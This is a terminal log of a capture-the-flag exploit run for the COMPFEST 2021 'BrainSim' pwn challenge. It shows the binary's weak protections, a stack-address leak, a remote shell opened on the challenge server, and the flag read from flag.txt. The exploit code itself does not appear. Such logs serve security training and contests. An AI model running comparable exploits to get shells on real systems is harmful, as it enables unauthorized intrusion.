mito@ubuntu:~/CTF/COMPFEST_CTF_2021/Pwn_BrainSim/brainsim-master-public/public$ python solve.py r
[*] '/home/mito/CTF/COMPFEST_CTF_2021/Pwn_BrainSim/brainsim-master-public/public/BrainSim'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
[+] Opening connection to 103.152.242.242 on port 29461: Done
stack_leak = 0x7ffd02a75070
[*] Switching to interactive mode

Output: $ ls -l
total 48
-rwxr-xr-x 1 0 0 21064 Sep 12 04:47 BrainSim
-rw-r--r-- 1 0 0  2261 Sep 12 04:47 BrainSim.c
drwxr-xr-x 2 0 0  4096 Sep 12 04:40 bin
drwxr-xr-x 2 0 0  4096 Sep 12 04:40 dev
-r--r--r-- 1 0 0    56 Sep 12 04:47 flag.txt
lrwxrwxrwx 1 0 0     7 Sep 12 04:40 lib -> usr/lib
lrwxrwxrwx 1 0 0     9 Sep 12 04:40 lib32 -> usr/lib32
lrwxrwxrwx 1 0 0     9 Sep 12 04:40 lib64 -> usr/lib64
lrwxrwxrwx 1 0 0    10 Sep 12 04:40 libx32 -> usr/libx32
-rwxr-xr-x 1 0 0   338 Sep 12 04:47 run.sh
drwxr-xr-x 6 0 0  4096 Sep 12 04:40 usr
$ cat flag.txt
COMPFEST13{570PPPP_I7___937_0U7_0f_my_H34d___b6fc1236d6}